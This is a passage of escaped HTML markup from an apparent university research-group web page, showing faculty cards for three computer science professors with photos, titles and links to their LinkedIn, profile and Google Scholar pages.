style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\" class=\"wp-image-1675 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/cropped-cropped-hu_new-1-e1697143455517.jpg\" class=\"wp-image-1677 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-cropped-patterson-e1697143515399.jpg\" class=\"wp-image-1679 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 